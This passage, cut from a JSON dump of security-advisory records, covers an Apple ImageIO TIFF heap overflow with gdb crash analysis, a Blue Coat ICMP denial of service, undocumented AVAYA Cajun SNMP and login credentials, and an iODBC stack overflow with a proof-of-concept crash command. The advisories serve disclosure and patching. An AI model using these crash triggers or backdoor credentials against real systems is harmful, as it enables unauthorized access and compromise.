0x102ed7790 0x102ed7790\r\nr8 0x15dafbfff 5866766335\r\nr9 0x7 7\r\nr10 0x10340ddf0 4349550064\r\nr11 0x10078c000 4302880768\r\nr12 0x1 1\r\nr13 0x100000 1048576\r\nr14 0x0 0\r\nr15 0x0 0\r\nrip 0x7fffffe00847 0x7fffffe00847 <__memcpy+167>\r\neflags 0x10286 66182\r\ncs 0x27 39\r\nss 0x0 0\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/i $rip\r\n0x7fffffe00847 <__memcpy+167>: movdqa XMMWORD PTR [rdi+rcx],xmm0\r\n(gdb)\r\n\r\nReducing the tilewidth to 0000FF00 or 65280 we get a different crash:\r\n\r\nProgram received signal EXC_BAD_ACCESS, Could not access memory.\r\nReason: KERN_INVALID_ADDRESS at address: 0x00000001007c7000\r\n[Switching to process 2379]\r\n0x00007fffffe007c5 in __memcpy ()\r\n(gdb) i r\r\nrax 0xffffffff 4294967295\r\nrbx 0x1007c5030 4303114288\r\nrcx 0x4 4\r\nrdx 0x20 32\r\nrsi 0x1159c4194 4657529236\r\nrdi 0x1007c7000 4303122432\r\nrbp 0x10067d790 0x10067d790\r\nrsp 0x10067d790 0x10067d790\r\nr8 0x1159f3e9f 4657725087\r\nr9 0x7 7\r\nr10 0x100122cc0 4296158400\r\nr11 0x1007c5030 4303114288\r\nr12 0x473 1139\r\nr13 0x1fe0 8160\r\nr14 0x0 0\r\nr15 0x0 0\r\nrip 0x7fffffe007c5 0x7fffffe007c5 <__memcpy+37>\r\neflags 0x10202 66050\r\ncs 0x27 39\r\nss 0x0 0\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/i $rip\r\n0x7fffffe007c5 <__memcpy+37>: mov DWORD PTR [rdi],eax\r\n(gdb)\r\n(gdb) bt\r\n#0 0x00007fffffe007c5 in __memcpy ()\r\n#1 0x00007fff80f766ef in getBandProcTIFF ()\r\n\r\nDisassembly of function: \r\nBreakpoint here:\r\n\r\n0x00007fff80f765a4 <getBandProcTIFF+284>: call 0x7fff8104cade<dyld_stub__cg_TIFFGetField>\r\n\r\nFunction reads the value of the TileWidth, arguments:\r\n\r\nrsi 0x142 322\r\n\r\nesi contains the tiff image tag for tile width that this function extracts the value for, in this instance its 322 which is TileWidth.\r\n\r\n0x00007fff80f765a9 <getBandProcTIFF+289>: lea rdx,[rbp-0x38]\r\n0x00007fff80f765ad <getBandProcTIFF+293>: mov rax,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f765b4 <getBandProcTIFF+300>: mov rdi,QWORD PTR [rax+0x38]\r\n0x00007fff80f765b8 <getBandProcTIFF+304>: mov esi,0x143\r\n0x00007fff80f765bd <getBandProcTIFF+309>: xor eax,eax\r\n0x00007fff80f765bf <getBandProcTIFF+311>: call 0x7fff8104cade<dyld_stub__cg_TIFFGetField>// read tilelength field\r\n0x00007fff80f765c4 <getBandProcTIFF+316>: mov edx,DWORD PTR [rbp-0x38]\r\n0x00007fff80f765c7 <getBandProcTIFF+319>: mov rax,rbx\r\n0x00007fff80f765ca <getBandProcTIFF+322>: mov rcx,rdx\r\n0x00007fff80f765cd <getBandProcTIFF+325>: xor edx,edx\r\n0x00007fff80f765cf <getBandProcTIFF+327>: div rcx\r\n0x00007fff80f765d2 <getBandProcTIFF+330>: mov QWORD PTR [rbp-0x510],rax\r\n0x00007fff80f765d9 <getBandProcTIFF+337>: xor r14d,r14d\r\n0x00007fff80f765dc <getBandProcTIFF+340>: jmp 0x7fff80f76720<getBandProcTIFF+664>\r\n0x00007fff80f765e1 <getBandProcTIFF+345>: mov rbx,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f765e8 <getBandProcTIFF+352>: mov rdx,QWORD PTR [rbx+0x8]\r\n0x00007fff80f765ec <getBandProcTIFF+356>: lea rax,[r14+0x1]\r\n0x00007fff80f765f0 <getBandProcTIFF+360>: mov QWORD PTR [rbp-0x468],rax\r\n0x00007fff80f765f7 <getBandProcTIFF+367>: imul rax,rdx\r\n0x00007fff80f765fb <getBandProcTIFF+371>: mov QWORD PTR [rbp-0x4b0],rdx\r\n0x00007fff80f76602 <getBandProcTIFF+378>: cmp QWORD PTR [rbp-0x4e8],rax\r\n0x00007fff80f76609 <getBandProcTIFF+385>: jae 0x7fff80f76623<getBandProcTIFF+411>\r\n0x00007fff80f7660b <getBandProcTIFF+387>: mov rax,r14\r\n0x00007fff80f7660e <getBandProcTIFF+390>: imul rax,rdx\r\n0x00007fff80f76612 <getBandProcTIFF+394>: mov rcx,QWORD PTR [rbp-0x4e8]\r\n0x00007fff80f76619 <getBandProcTIFF+401>: sub rcx,rax\r\n0x00007fff80f7661c <getBandProcTIFF+404>: mov QWORD PTR [rbp-0x4b0],rcx\r\n0x00007fff80f76623 <getBandProcTIFF+411>: mov rax,QWORD PTR [rbp-0x4f0]\r\n0x00007fff80f7662a <getBandProcTIFF+418>: imul rax,rdx\r\n0x00007fff80f7662e <getBandProcTIFF+422>: imul rax,r14\r\n0x00007fff80f76632 <getBandProcTIFF+426>: add rax,QWORD PTR [rbp-0x4f8]\r\n0x00007fff80f76639 <getBandProcTIFF+433>: mov QWORD PTR [rbp-0x4b8],rax\r\n0x00007fff80f76640 <getBandProcTIFF+440>: xor r15d,r15d\r\n0x00007fff80f76643 <getBandProcTIFF+443>: jmp 0x7fff80f76709<getBandProcTIFF+641>\r\n0x00007fff80f76648 <getBandProcTIFF+448>: mov rcx,r14\r\n0x00007fff80f7664b <getBandProcTIFF+451>: mov rax,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f76652 <getBandProcTIFF+458>: imul rcx,QWORD PTR [rax+0x8]\r\n0x00007fff80f76657 <getBandProcTIFF+463>: mov rdi,QWORD PTR [rax+0x38]\r\n0x00007fff80f7665b <getBandProcTIFF+467>: xor r9d,r9d\r\n0x00007fff80f7665e <getBandProcTIFF+470>: xor r8d,r8d\r\n0x00007fff80f76661 <getBandProcTIFF+473>: mov edx,r15d\r\n0x00007fff80f76664 <getBandProcTIFF+476>: mov rsi,QWORD PTR [rbp-0x508]\r\n0x00007fff80f7666b <getBandProcTIFF+483>: call 0x7fff8104cb08<dyld_stub__cg_TIFFReadTile>\r\n0x00007fff80f76670 <getBandProcTIFF+488>: inc eax\r\n0x00007fff80f76672 <getBandProcTIFF+490>: jne 0x7fff80f76680<getBandProcTIFF+504>\r\n0x00007fff80f76674 <getBandProcTIFF+492>: mov rdi,QWORD PTR [rbp-0x508]\r\n0x00007fff80f7667b <getBandProcTIFF+499>: jmp 0x7fff80f76917<getBandProcTIFF+1167>\r\n0x00007fff80f76680 <getBandProcTIFF+504>: mov eax,r15d\r\n0x00007fff80f76683 <getBandProcTIFF+507>: add eax,DWORD PTR [rbp-0x38]\r\n0x00007fff80f76686 <getBandProcTIFF+510>: cmp QWORD PTR [rbp-0x4e0],rax\r\n0x00007fff80f7668d <getBandProcTIFF+517>: jae 0x7fff80f7669b<getBandProcTIFF+531>\r\n0x00007fff80f7668f <getBandProcTIFF+519>: mov rdx,QWORD PTR [rbp-0x4e0]\r\n0x00007fff80f76696 <getBandProcTIFF+526>: sub rdx,rbx\r\n0x00007fff80f76699 <getBandProcTIFF+529>: jmp 0x7fff80f7669e<getBandProcTIFF+534>\r\n0x00007fff80f7669b <getBandProcTIFF+531>: mov edx,DWORD PTR [rbp-0x34]\r\n0x00007fff80f7669e <getBandProcTIFF+534>: mov rcx,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f766a5 <getBandProcTIFF+541>: mov rax,QWORD PTR [rcx+0x18]\r\n0x00007fff80f766a9 <getBandProcTIFF+545>: imul rdx,rax\r\n0x00007fff80f766ad <getBandProcTIFF+549>: lea r13,[rdx+0x7]\r\n0x00007fff80f766b1 <getBandProcTIFF+553>: shr r13,0x3\r\n0x00007fff80f766b5 <getBandProcTIFF+557>: imul rbx,rax\r\n0x00007fff80f766b9 <getBandProcTIFF+561>: lea rax,[rbx+0x7]\r\n0x00007fff80f766bd <getBandProcTIFF+565>: shr rax,0x3\r\n0x00007fff80f766c1 <getBandProcTIFF+569>: mov rdx,QWORD PTR [rbp-0x4b8]\r\n0x00007fff80f766c8 <getBandProcTIFF+576>: lea rbx,[rax+rdx]\r\n0x00007fff80f766cc <getBandProcTIFF+580>: xor r12d,r12d\r\n\r\n// loops copying from a ptr in to a buffer\r\n\r\n0x00007fff80f766cf <getBandProcTIFF+583>: jmp 0x7fff80f766f6<getBandProcTIFF+622>\r\n0x00007fff80f766d1 <getBandProcTIFF+585>: imul rax,QWORD PTR [rbp-0x510]\r\n0x00007fff80f766d9 <getBandProcTIFF+593>: mov rcx,QWORD PTR [rbp-0x508]\r\n0x00007fff80f766e0 <getBandProcTIFF+600>: lea rsi,[rax+rcx]\r\n0x00007fff80f766e4 <getBandProcTIFF+604>: mov rdx,r13\r\n0x00007fff80f766e7 <getBandProcTIFF+607>: mov rdi,rbx\r\n0x00007fff80f766ea <getBandProcTIFF+610>: call 0x7fff8104cdb4 <dyld_stub_memcpy>//crash in memcpy\r\n0x00007fff80f766ef <getBandProcTIFF+615>: add rbx,QWORD PTR [rbp-0x4f0]\r\n0x00007fff80f766f6 <getBandProcTIFF+622>: mov eax,r12d\r\n0x00007fff80f766f9 <getBandProcTIFF+625>: inc r12\r\n0x00007fff80f766fc <getBandProcTIFF+628>: cmp QWORD PTR [rbp-0x4b0],rax\r\n0x00007fff80f76703 <getBandProcTIFF+635>: ja 0x7fff80f766d1<getBandProcTIFF+585>\r\n0x00007fff80f76705 <getBandProcTIFF+637>: add r15d,DWORD PTR [rbp-0x34]\r\n0x00007fff80f76709 <getBandProcTIFF+641>: mov ebx,r15d\r\n0x00007fff80f7670c <getBandProcTIFF+644>: cmp rbx,QWORD PTR [rbp-0x4e0]\r\n0x00007fff80f76713 <getBandProcTIFF+651>: jb 0x7fff80f76648<getBandProcTIFF+448>\r\n0x00007fff80f76719 <getBandProcTIFF+657>: mov r14,QWORD PTR [rbp-0x468]\r\n0x00007fff80f76720 <getBandProcTIFF+664>: cmp r14,QWORD PTR [rbp-0x500]\r\n0x00007fff80f76727 <getBandProcTIFF+671>: jne 0x7fff80f765e1<getBandProcTIFF+345>\r\n0x00007fff80f7672d <getBandProcTIFF+677>: mov rdi,QWORD PTR [rbp-0x508]\r\n0x00007fff80f76734 <getBandProcTIFF+684>: jmp 0x7fff80f76d2d<getBandProcTIFF+2213>\r\n0x00007fff80f76739 <getBandProcTIFF+689>: mov rax,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f76740 <getBandProcTIFF+696>: cmp BYTE PTR [rax+0x45],0x0\r\n0x00007fff80f76744 <getBandProcTIFF+700>: je 0x7fff80f76d37<getBandProcTIFF+2223>\r\n0x00007fff80f7674a <getBandProcTIFF+706>: mov r13,QWORD PTR [rax+0x10]\r\n\r\nIt appears as the tileWidth controls the size of the iterator in a previous loop. In turn we can control the number of times the memcpy() is called and the amount of buffer copied. \r\n\r\nFor example, tileWidth = FF00:\r\n\r\nBreakpoint 6, 0x00007fff80f766ea in getBandProcTIFF ()\r\nr12 0x473 1139\r\n0x7fff80f766ea <getBandProcTIFF+610>: call 0x7fff8104cdb4<dyld_stub_memcpy>\r\n\r\nThe number of iterations is stored in the $r12 register. \r\n\r\nDecreasing the tileWidth causes the loop to iterate more, tileWidth=DD00 because the value incremented is lower: \r\n\r\nr12 0x478 1144 \r\n\r\nWhen we use a large value such as, 00800000 (8388608) we only call memcpy() once:\r\n\r\nr12 0x1 1\r\n(gdb) x/i $rip\r\n0x7fffffe00847 <__memcpy+167>: movdqa XMMWORD PTR [rdi+rcx],xmm0\r\n(gdb)\r\n\r\nI believe this triggers the integer overflow and in turn an overflow in the memcpy.\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nApple has released a patch that addresses the issue. The announcement of the patch can be found here:\r\n\r\nhttp://support.apple.com/kb/HT4723\r\n\r\nNGS Secure Research\r\nhttp://www.ngssecure.com\r\n", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:DOC:27160", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27160", "title": "NGS00062 Technical Advisory: Apple OSX / iPhone ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\r\n\r\n\r\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\r\nSicherheit:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nBlue Coat Products ICMP Message Handling Denial of Service\r\n\r\nSECUNIA ADVISORY ID:\r\nSA16126\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/16126/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nOPERATING SYSTEM:\r\nBlue Coat CacheOS 3.x\r\nhttp://secunia.com/product/2133/\r\nBlue Coat CacheOS 4.x\r\nhttp://secunia.com/product/2213/\r\nBlue Coat Director (SGME)\r\nhttp://secunia.com/product/2134/\r\nBlue Coat Security Gateway OS (SGOS) 2.x\r\nhttp://secunia.com/product/2132/\r\nBlue Coat Security Gateway OS (SGOS) 3.x\r\nhttp://secunia.com/product/2214/\r\n\r\nDESCRIPTION:\r\nBlue Coat Systems has acknowledged some vulnerabilities in various\r\nproducts, which can be exploited by malicious people to cause a DoS\r\n(Denial of Service) on an active TCP session.\r\n\r\nFor more information:\r\nSA14904\r\n\r\nThe vulnerability affects the following products.\r\n* All CacheOS systems (CA/SA 4.1)\r\n* All SGOS systems (SGOS 2.1.11 and earlier, SGOS 3.2.4 and earlier,\r\nSGOS 4.1.1)\r\n* All SGME systems and Spyware Interceptor systems\r\n\r\nSOLUTION:\r\nPatches are available for SGOS 3 and 4. \r\n\r\nUpdate to version 3.2.5:\r\nhttp://download.bluecoat.com/release/SGOS3/index.html\r\n\r\nUpdate to version 4.1.2:\r\nhttp://download.bluecoat.com/release/SGOS4/index.html\r\n\r\nORIGINAL ADVISORY:\r\nBlue Coat Systems:\r\nhttp://www.bluecoat.com/support/knowledge/advisory_icmp_error_message_vulnerabilities.html\r\n\r\nOTHER REFERENCES:\r\nSA14904:\r\nhttp://secunia.com/advisories/14904/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-07-20T00:00:00", "published": "2005-07-20T00:00:00", "id": "SECURITYVULNS:DOC:9241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9241", "title": "[SA16126] Blue Coat Products ICMP Message Handling Denial of Service", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:16", "bulletinFamily": "software", "description": "Undocumented read/write SNMP community NoGaH$@!. Undocumented accounts diag/danger and manuf/xxyyzz.", "modified": "2002-10-16T00:00:00", "published": "2002-10-16T00:00:00", "id": "SECURITYVULNS:VULN:2213", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2213", "title": "AVAYA Cajun unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:16", "bulletinFamily": "software", "description": "\u041f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u043f\u0440\u0438 \u0434\u043b\u0438\u043d\u043d\u043e\u043c \u0438\u043c\u0435\u043d\u0438 DSN (\u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0430 \u0434\u0430\u043d\u043d\u044b\u0445). \u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a \u0434\u0430\u043d\u043d\u044b\u0445 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 PHP.", "modified": "2001-11-27T00:00:00", "published": "2001-11-27T00:00:00", "id": "SECURITYVULNS:VULN:1591", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:1591", "title": "\u041f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 IODBC (buffer overflow)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "description": "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++\r\nALERT! ALERT! A NEW BUFFER OVERFLOW IN LIBRARY FROM ROXEN! ALERT! ALERT!\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\nGOBBLES Lab official mascot died today and we all our very sad at the\r\npassing of our dear friend Mr. Goldilocks the Goldfish who is no longer\r\nwith us but except in our memories. GOBBLES would like to take a moment\r\nof silence to honor the memory of this brave mascot and wish him well in\r\nhis future angelic endeavors. You are missed, old friend.\r\n\r\nPRODUCT\r\n*******\r\n\r\nRoxen Webserver\r\nwebsite: http://www.roxen.com\r\n\r\nand. . .\r\n\r\nIODBC database driver\r\nwebsite: http://www.iodbc.org\r\n\r\n(hehehe GOBBLES killing two birds with one stick)\r\n\r\nBACKGROUD\r\n*********\r\n\r\nGOBBLES were auditing the Roxen webserver packages for holes that can be\r\nused to comprimise servers so that GOBBLES could have the holes patched so\r\nthat no servers could be comprimised. During this audit a GOBBLES Labs\r\nresearcher approached GOBBLES with the bug found in IODBC which come with\r\nthe Roxen and ask GOBBLES to write an advisory on it so that the\r\nresearcher can go back to finding more bugs in software to present to the\r\nsecurity community. \r\n\r\nfrom the http://www.roxen.com GOBBLES does paste the following:\r\n\r\n Roxen WebServer\r\n\r\n The Roxen Platform is integrated with the open source Roxen WebServer.\r\n To function as the company platform and Web content Management system,\r\n Roxen WebServer needs the additional tools in Roxen Platform. Those\r\n tools are what deliver the real business benefits.\r\n [R] [R]\r\n\r\nthen from the http://www.iodbc.org website GOBBLES pastes:\r\n\r\n [arrwrt.jpg] What is the iODBC ?\r\n iODBC is the acronym for Independent Open DataBase Connectivity, an\r\n Open Source platform independent implementation of both the ODBC and\r\n X/Open specifications. It is rapidly emerging as the industry standard\r\n for developing solutions that are language, platform and database\r\n independent.\r\n [arrwrt.jpg] What is the iODBC Value Proposition ?\r\n The ability to develop applications independent of back-end database\r\n engine, operating system, and for the most part programming language.\r\n Although ODBC and iODBC are both 'C' based Application Programming\r\n Interfaces (APIs) there are numerous cross language hooks and bridges\r\n from languages such as: C++, Java, Perl, Python, TCL etc.\r\n iODBC has been ported to numerous platforms which includes:\r\n Linux (x86, Itanium, Alpha, Mips, and StrongArm), Solaris (Sparc &\r\n x86), AIX, HP-UX (PA-RISC & Itanium), Digital UNIX, Dynix, Generic\r\n UNIX 5.4, FreeBSD, MacOS 9, MacOS X, DG-UX, and OpenVMS.\r\n\r\nhehehehe look at all the platforms affected here!\r\n\r\nSo now you know! Thanks GOBBLES!\r\n\r\nSECURITY HISTORY\r\n****************\r\n\r\nGOBBLES made a GOBBLES Lab Security research research this IODBC much\r\nextensively in effort to learn about its security history so that GOBBLES\r\ncould pay appropriate credit to other researchers who have found bugs in\r\nthe IODBC prior to this advisory submitted by GOBBLES but nothing was\r\nfound after the researcher spent over nine hours studying www.google.com\r\nprobing it for information on the subject. Nothing was discovered by\r\nGOBBLES researcher, but this do not mean that IODBC has had no other\r\nbugs all it means is that GOBBLES Team was not able to find many\r\ninformation on the history of this product security on the world wide\r\nwebpage. GOBBLES Labs have got many criticisms on publishing research\r\nmaterials which have been found prior to the rediscovery by GOBBLES\r\nmembers and raises an interesting question to security researchers as to\r\nhow long a security research must spend researching security history of an\r\nsoftware program before starting to study it for new bugs, because what is\r\nreally more important finding bugs or spending times looking at webpages\r\ntrying to find out all bugs in software that have already been\r\nfound? GOBBLES read old issues of securityfocus.com mailing lists looking\r\nthrough other peoples comments on these things and found that very very\r\nfrequently different researchers will discover same things not knowing the\r\nbugs had been found and reported before. Consider following pastes and\r\nmaybe look at the url if you want also:\r\n\r\n LOCATION: Neohapsis / Archives / Vuln-Dev / Message Index / Re:\r\n Information Leak Bug Discovered in Netscape Mail!\r\n\r\n From: Markus Kern (markus-kern@gmx.net)\r\n Date: Thu Nov 22 2001 - 09:23:17 CST\r\n\r\n Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]\r\n _________________________________________________________________\r\n\r\n > We at GOBBLES Research have discovered an insecure condition in\r\n Netscape\r\n > mail which could assist an attacker in gaining important information\r\n > regarding the accounts of those who use the client.\r\n\r\n "Netscape 'document.referrer' User Information Disclosure\r\n Vulnerability"\r\n\r\n http://www.securityfocus.com/bid/2824\r\n\r\n "Originally discovered and posted to Bugtraq by Rop Gonggrijp\r\n <rop@itsx.com>\r\n on March 28, 1998. Rediscovered by 3APA3A <3APA3A@SECURITY.NNOV.RU> on\r\n May 30, 2001 and posted to Bugtraq on June 5, 2001."\r\n\r\n Also advisories with a little less noise would be really cool...\r\n\r\n --\r\n Markus Kern\r\n _________________________________________________________________\r\n\r\n\r\nhttp://archives.neohapsis.com/archives/vuln-dev/2001-q4/0540.html\r\n\r\nHere where it shown that GOBBLES was the last to discover a bug that was\r\nfirst discovered in 1998 and then rediscovered in May of this year by our\r\ngood friend 3apa3a, and still not a dead bug in November when GOBBLES find\r\nit again.\r\n\r\n\r\n>From these examples GOBBLES realize that this happen many times and will\r\nhappen many more times and now GOBBLES calls upon the security community\r\nfrom securityfocus.com and asks the question about how much time should be\r\nsubmitted into reading the world wide web looking for previously disclosed\r\ninformations. GOBBLES wonder if it is more important to bicker amongst\r\nourselves on the email lists about who found the bug originally and make\r\nfun of people and call them idiots for rediscovering an old bug when\r\nreally the idiot seem to be the vendor for not patching bug when it were\r\nfirst discovered. GOBBLES know it is wrong to take credit for research of\r\nothers which is what sometimes people say is done when a bug is\r\nrediscovered but it is not taking credit for research of others when the\r\nresearch has been done again by someone else to find the bug. Anyhow\r\nGOBBLES leave those thoughts with lists for discussion so that the\r\nsecurity community can agree on a new standard here and then there will be\r\nno future problems with it once everybody have agreed on a new policy.\r\n\r\n\r\nVERSIONS AFFECTED\r\n*****************\r\n\r\nAll versions are believed to be vulnerable since a bug of this epic size\r\ncould not be done by a modern day smart programmer who understands secure\r\nprogramming so logically GOBBLES assumes that it were introduced in\r\nearlier versions of the software done by amatuer programmers who still\r\nthink bounds checking isn't really important because at worse the program\r\nwill crash. GOBBLES think that an experienced modern day programmer has\r\nunderstood these things well enough to not do it so GOBBLES logic on this\r\nis solid. GOBBLES did only test the most recent version since that\r\ndownloading all old versions archived of the program would have taken\r\nforever to get across to GOBBLES Lab since we can not afford a broadband\r\ncablemodem right now for our labs and are on a very slow internet\r\nlink. If GOBBLES Researchers had downloaded all versions to confirm\r\nwhether or not it was there. GOBBLES also say it should be noted that the\r\npackage being audited for bugs were Roxen anyways and the versions of\r\nIODBC that ship with the latest build of the Roxen so that may help a new\r\npenetrator wanting to construct exploits for all these.\r\n\r\nTHE PROBLEM\r\n***********\r\n\r\nGOBBLES now show you some hacking.\r\n\r\nThe funtion _iodbcm_getinifile(..) is called from\r\n_iodbcdm_getkeyvalbydsn(...) like so:\r\n\r\nchar *\r\n_iodbcdm_getkeyvalbydsn (\r\n char *dsn,\r\n int dsnlen,\r\n char *keywd,\r\n char *value,\r\n int size)\r\n{\r\n char pathbuf[1024];\r\n char *path;\r\n ...\r\n path = _iodbcdm_getinifile (pathbuf, sizeof (pathbuf));\r\n ...\r\n}\r\n\r\nchar *\r\n_iodbcdm_getinifile (char *buf, int size)\r\n{\r\n char *ptr;\r\n ...\r\n if ((ptr = getenv ("ODBCINI")) != NULL)\r\n {\r\n strcpy (buf, ptr);\r\n return buf;\r\n }\r\n ...\r\n}\r\n\r\nHow many times is getinifile() called? Well it is always called when\r\ngetkeyvalbydsn() is called, so lets do this (eliminating prototypes):\r\n\r\nGOBBLES@localhost:/usr/local/roxen_1.3.122/libiodbc$ grep getkeyval\r\n*.c | grep -v "buf, int size" | grep -v char\r\n\r\nconnect.c: ptr = _iodbcdm_getkeyvalbydsn (dsn, dsnlen, "TraceFile",\r\nconnect.c: ptr = _iodbcdm_getkeyvalbydsn (dsn, dsnlen, "Trace",\r\nconnect.c: ptr = _iodbcdm_getkeyvalbydsn (szDSN, cbDSN, "Driver",\r\nconnect.c: drv = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn,\r\nconnect.c: dsn = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn,\r\nconnect.c: drv = _iodbcdm_getkeyvalbydsn (dsn, SQL_NTS, "Driver",\r\nconnect.c: drv = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn,\r\nconnect.c: dsn = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn,\r\nconnect.c: drv = _iodbcdm_getkeyvalbydsn (dsn, SQL_NTS, "Driver",\r\ninfo.c: _iodbcdm_getkeyvalbydsn (sect[cur_entry], strlen\r\n(sect[cur_entry]),\r\nmisc.c:_iodbcdm_getkeyvalbydsn (\r\nmisc.c:_iodbcdm_getkeyvalinstr (\r\n\r\nGOBBLES count that add up to 12 (hehe actually GOBBELS cheated cheated and\r\npiped to wc -l). GOBBLES looked closer and found that SQLConnect() and \r\nSQLDriverConnect() both call it. Since these two functions are the meat\r\nof the API GOBBLES think it safe to assume this vulnerability is present \r\nevery time the library is used.\r\n\r\nNow lets see what happens...\r\n\r\nEXPLOIT DETAILS\r\n***************\r\n\r\nFirst GOBBLES give glimpse of what happens.\r\n\r\nGOBBLES@localhost:/usr/local/roxen_1.3.122/libiodbc/samples$ export\r\nODBCINIFILE=`perl -e 'print "A"x4000'`\r\nGOBBLES@localhost:/usr/local/roxen_1.3.122/libiodbc/samples$ gdb ./odbctest\r\nGNU gdb 19990928\r\nCopyright 1998 Free Software Foundation, Inc.\r\nGDB is free software, covered by the GNU General Public License, and you\r\nare\r\nwelcome to change it and/or distribute copies of it under certain\r\nconditions.\r\nType "show copying" to see the conditions.\r\nThere is absolutely no warranty for GDB. Type "show warranty" for\r\ndetails.\r\nThis GDB was configured as "i686-pc-linux-gnu"...\r\n(no debugging symbols found)...\r\n(gdb) run\r\nStarting program: /usr/local/roxen_1.3.122/libiodbc/samples/odbctest\r\n(no debugging symbols found)...(no debugging symbols found)...\r\nOpenLink ODBC Demonstration program\r\nThis program shows an interactive SQL processor\r\n\r\n\r\nEnter ODBC connect string (? shows list): ?\r\n\r\nDSN | Description\r\n---------------------------------------------------------------\r\n(no debugging symbols found)...\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x41414141 in ?? ()\r\n(gdb) info reg\r\neax 0x64 100\r\necx 0xdd8 3544\r\nedx 0x40138960 1075022176\r\nebx 0xbfffe7f8 -1073747976\r\nesp 0xbfffe7b4 -1073748044\r\nebp 0x41414141 1094795585\r\nesi 0xbfffe7fa -1073747974\r\nedi 0xbfffe8fc -1073747716\r\neip 0x41414141 1094795585\r\neflags 0x210246 2163270\r\ncs 0x23 35\r\nss 0x2b 43\r\nds 0x2b 43\r\nes 0x2b 43\r\nfs 0x0 0\r\ngs 0x0 0\r\ncwd 0xffff037f -64641\r\nswd 0xffff0000 -65536\r\ntwd 0xffffffff -1\r\nfip 0x4004b431 1074050097\r\nfcs 0x77d0023 125632547\r\nfopo 0xbffffa04 -1073743356\r\nfos 0xffff002b -65493\r\n(gdb) QUIT\r\n\r\n\r\nhehehe do you see where the eip is overwrited with A? Now we own eip and\r\ncan insert custom GOBBLECODE into the stack to smash it! GOBBLES will\r\nleave writing this exploit to the fellow mailing list penetrators as an\r\nexercise in programming because GOBBLES does not have a real use for an\r\nexploit for this bug right now and doesn't want to waste the precious\r\nresearch minutes writing one for companies to make the money with when all\r\nthe research is right there for them to use to make their own. \r\n\r\nFor those who do not understand how overflowing IODBC library can be a\r\nsecurity problem GOBBLES do ask that you consider what would happen if a\r\nbadly written php or perl or other kinds of cgi script were made that had\r\na poor open() type call where an evil penetrator could modify the\r\nenvironment to successfully exploit library calls then getting shell\r\naccess from a more obscure case. GOBBLES say if 